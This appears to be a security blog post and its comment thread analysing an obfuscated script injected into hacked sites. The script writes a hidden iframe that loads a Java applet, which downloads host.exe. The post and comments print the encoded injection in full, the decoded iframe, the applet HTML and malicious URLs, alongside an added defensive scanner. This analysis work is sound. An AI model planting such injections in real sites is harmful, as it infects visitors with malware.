

Today, I can see many blacklisted sites where Google reports one of the following three domains as a source of the problem:
E.g.
Malicious software is hosted on 1 domain(s), including medien-verlag.de/.
The attack is quite interesting so I decided to share results of my initial investigation here.
On infected sites, I found an obfuscated malicious script at the very bottom of the HTML code:
document .write('\u003C\u0049\u0046\u0052\u0041\u004D\u0045\u0020\u006E\u0061\u006D...skipped...\u0074\u0068\u003D\u0022\u0031\u0022\u0020\u006D\u0061\u0072\u0067\u0069\u006E\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0031\u0022\u003E\u003C\u002F\u0049\u0046\u0052\u0041\u004D\u0045\u003E');
Unmask Parasites detects the injected malicious scripts quite well. Here you can see how it looks in a sample report:

When people load the infected pages, this code injects a hidden iframe:
<IFR AME name="x" src="http://www.medien-verlag .de/ new.htm" width="0" height="0" scrolling="no" frameborder="0" marginwidth="1" marginheight="1"></IFRAM E>
In other variations, the iframe may be from www.aubreyserr .com/ new.htm or www.yennicq .be/ new.htm.
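Site owners can look for this injection statically, without ever executing the script. The scanner below is an added example, not code from the original post or from Unmask Parasites: it decodes `\uXXXX`-escaped `document.write()` arguments and reports any iframe with zero width and height. The function names and the `malicious.example` host in the constructed fixture are assumptions.

```javascript
// Static scanner: decodes \uXXXX-escaped document.write() payloads without
// executing them and reports iframes hidden by zero-size dimensions.

// Matches document.write('...') whose argument is a run of \uXXXX escapes.
// \s* tolerates spacing variants such as "document .write".
const WRITE_RE =
  /document\s*\.\s*write(?:ln)?\s*\(\s*(['"])((?:\\u[0-9a-fA-F]{4}){8,})\1\s*\)/g;

function decodeUnicodeEscapes(s) {
  return s.replace(/\\u([0-9a-fA-F]{4})/g,
    (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Read one attribute from a tag; \b keeps "width" from matching "marginwidth".
function attr(tag, name) {
  const m = new RegExp('\\b' + name + '\\s*=\\s*["\']?([^"\'\\s>]*)', 'i').exec(tag);
  return m ? m[1] : null;
}

function findHiddenIframes(html) {
  const findings = [];
  for (const m of html.matchAll(WRITE_RE)) {
    const decoded = decodeUnicodeEscapes(m[2]); // decode only, never eval
    for (const t of decoded.matchAll(/<iframe\b[^>]*>/gi)) {
      const w = attr(t[0], 'width'), h = attr(t[0], 'height');
      findings.push({
        offset: m.index,               // where the script sits in the page
        src: attr(t[0], 'src'),        // what the iframe would load
        hidden: w === '0' && h === '0',
      });
    }
  }
  return findings;
}

// Constructed fixture (not from the post): placeholder host, same attribute
// layout as the iframe shown above. escapeAll only builds the test input.
const escapeAll = s => [...s].map(
  c => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0').toUpperCase()).join('');
const SAMPLE_IFRAME = '<IFRAME name="x" src="http://malicious.example/new.htm" ' +
  'width="0" height="0" scrolling="no" frameborder="0" marginwidth="1"></IFRAME>';
const SAMPLE_PAGE = '<html><body><p>Hello</p>\n<script>document.write(\'' +
  escapeAll(SAMPLE_IFRAME) + '\');</script></body></html>';
const CLEAN_PAGE = '<html><body><script>document.write("<b>hi</b>");</script></body></html>';

console.log(findHiddenIframes(SAMPLE_PAGE));
```

Run it over each served page or over `index.html` / `index.php` on disk; any finding with `hidden: true` and an off-site `src` deserves a manual look.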
The page loaded by the iframe is very simple:
<html>
<body>
<ap plet name="Java Update" code="Polat.class" archive="Hidden.jar" height="10" width="1">
<param name="url" value="hxxp://www.medien-verlag .de/ host.exe">
</applet>
</p>
<p></p>
</div>
</body></html>
As you can see, it only loads a Java applet, Hidden.jar, with one parameter that points to the “host.exe” file in the root of the same site.
I decided to check the files using VirusTotal to find out how different anti-virus tools detect them.

Only 10 out of 36 tools consider this file malicious. Most of them recognize it as some sort of “Java Downloader”. So I guess all it does is download another malicious file onto a victim’s computer. In this case, the file that’s being downloaded is that “host.exe”. So let’s check this file.

24 out of 43 tools detect www.medien-verlag.de/host.exe as malicious. Quite a poor detection rate. The following popular AV tools still can’t detect it 11 hours after my initial VirusTotal check: Avast, Kaspersky, Microsoft, Sophos, TrendMicro.
So what about host.exe files from other sites? They seem to be different on each site.
Right now 30 out of 42 tools detect www.yennicq .be/host.exe as malicious. All major anti-viruses (except for Kaspersky and Microsoft) do a good job here.

www.aubreyserr .com/host.exe does quite well too: 30 out of 43.

I should also mention that all three domains belong to legitimate websites on three different servers. Once again (as in Gumblar and Koobface), hackers use compromised sites to host malicious files and use them to attack visitors to hacked third-party sites.
According to Google’s Safe Browsing project, there are currently about 2,000 known infected sites:
I’ve only started this investigation today, so a lot remains unclear. E.g. what security hole is used to compromise affected sites? Is the injected script the only modification to the hacked sites? Are there any other domains involved in this attack? etc. If you have answers to these questions or just want to share your thoughts, please join the discussion in the comments.


[...] This post was mentioned on Twitter by Denis. Denis said: [blog] Injected Script Loads Host.exe Using Hidden Iframes and Java Applets http://bit.ly/eq1At2 – more info required [...]
Some of the sites hosted at the data center got infected too. Here is the script they changed in index.html and index.php.
document write(‘\u003C\u0049\u0046\u0052\u0041\u004D\u0045\u0020\u006E\u0061\u006D\u0065\u003D\u0022\
u0078\u0022\u0020\u0073\u0072\u0063\u003D\u0022\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u0077\u0077\u0077\u002E\u006E\u0061\u0072\
u0063\u006F\u0073\u002E\u006E\u006C\u002F\u006E\u0065\u0077\u002E\u0068\u0074\u006D\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003D\
u0022\u0030\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0030\u0022\u0020\u0073\u0063\u0072\u006F\u006C\u006C\u0069\
u006E\u0067\u003D\u0022\u006E\u006F\u0022\u0020\u0066\u0072\u0061\u006D\u0065\u0062\u006F\u0072\u0064\u0065\u0072\u003D\u0022\u0030\
u0022\u0020\u006D\u0061\u0072\u0067\u0069\u006E\u0077\u0069\u0064\u0074\u0068\u003D\u0022\u0031\u0022\u0020\u006D\u0061\u0072\u0067\
u0069\u006E\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0022\u0031\u0022\u003E\u003C\u002F\u0049\u0046\u0052\u0041\u004D\u0045\u003E’
);
The files are changed on 23rd Dec 2010 around 11:48 PM.
Thanks.
The code translates to a similar iframe from “hxxp://www .narcos .nl/ new.htm”
SANS ISC has a blog post on what looks like the same malware http://isc.sans.edu/diary.html?storyid=10168
Indeed, the same malware. It has more detailed information on how the malicious Java downloader works.
A few more malicious URLs from that post.
hxxp://benaguasil. net/ new.htm
hxxp://mavi1. org/ new.htm
I’ve been hacked too.
I had several ‘domains’ hosted on that account, but they only changed 2 index.php files with that redirect.
I think they entered through a sketchup document I hosted, but I have no idea how.
get hacked again and this time it is from
hxxp://caktu.com/new.htm
The hacker comes in through the HTTP port. Still finding out how he hacked in.
I was wondering if the “hosts.exe” causes your Windows’ hosts file to load an acceptable host domain which otherwise would be rejected.
Anyhow, just a wild thought.